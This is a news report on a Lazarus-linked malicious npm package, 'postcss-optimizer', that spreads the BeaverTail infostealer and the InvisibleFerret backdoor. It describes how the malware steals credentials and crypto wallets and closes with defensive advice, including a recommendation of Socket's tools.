Lazarus Hackers Deploy Malicious NPM Packages on Software Developers Systems

In a detailed investigation by Socket security researchers, a new malicious npm package, “postcss-optimizer,” has been linked to the notorious North Korean Advanced Persistent Threat (APT) group Lazarus.

The package, posing as a legitimate open-source dependency, was found to contain malicious code, including the BeaverTail malware, which functions as both an infostealer and a malware loader.

The discovery underscores increasing supply chain risks within open-source ecosystems.

The malicious package, downloaded 477 times before detection, mimics the popular postcss library to deceive developers.

It operates as a sophisticated multi-stage attack, targeting users of Windows, macOS, and Linux systems.

Upon installation, the malware exfiltrates sensitive data, such as credentials, browser cookies, and cryptocurrency wallet files, while also deploying secondary-stage payloads like the InvisibleFerret backdoor.

Behavioral analysis revealed that the package employs obfuscation techniques to evade detection, including variable renaming, string encoding, and control flow flattening

Infection and Data Exfiltration

The attack relies on impersonation tactics, whereby the npm package registry alias “yolorabbit” replicates the structure of the legitimate postcss library, which has over 16 billion downloads.

The malware achieves persistence by modifying registry scripts (Windows) or initiating Python-based commands (macOS/Linux).

Once operational, it exfiltrates data to a hardcoded Command and Control (C2) server, leveraging HTTP POST requests.

Additionally, it retrieves further payloads to reinforce long-term system compromise.

The malware systematically collects system information, such as operating system type, home directory paths, and temporary file locations.

It targets locally stored credentials, browser data, macOS keychains, and cryptocurrency wallet files.

Specific browser extensions for MetaMask, Phantom, Binance Wallet, and Coinbase Wallet are encoded within the script to prioritize cryptocurrency theft.

For macOS, login keychain data is exploited, and for Solana wallets, private key directories are directly accessed.

Obfuscation and Persistence

Researchers detected advanced obfuscation methods in the malicious code, including techniques to hinder static analysis.

Dynamic execution paths were used for payload delivery, adapting the methods based on the host operating system for increased effectiveness.

Socket’s automated analysis tools flagged suspicious behaviors, including shell command execution and network communications with the C2 server.

The attack closely mirrors tactics seen in prior Lazarus campaigns, notably their widespread use of staged malware delivery.

Previous incidents involving North Korean APT groups have used similar multi-vector infiltration across software supply chains, such as npm-based attacks documented by Unit 42 researchers in 2022.

This incident highlights the vulnerabilities present in open-source ecosystems and the evolving methodology of state-sponsored cyber actors.

Supply chain compromises, like the postcss-optimizer campaign, jeopardize not only individual developers but also broader organizational networks, making proactive security measures imperative.

To mitigate risks, organizations are urged to adopt automated dependency review systems, such as Socket’s GitHub integration, which scans pull requests for malicious or anomalous behaviors.

Incorporating tools like the Socket CLI ensures open-source dependencies are scrutinized during installations.

Regular audits of software libraries, coupled with real-time threat intelligence, can reduce exposure to such risks.

This attack illustrates the continued adaptability of Lazarus-linked campaigns, signaling the need for enhanced vigilance in the open-source community to counter these persistent threats.

Also Read: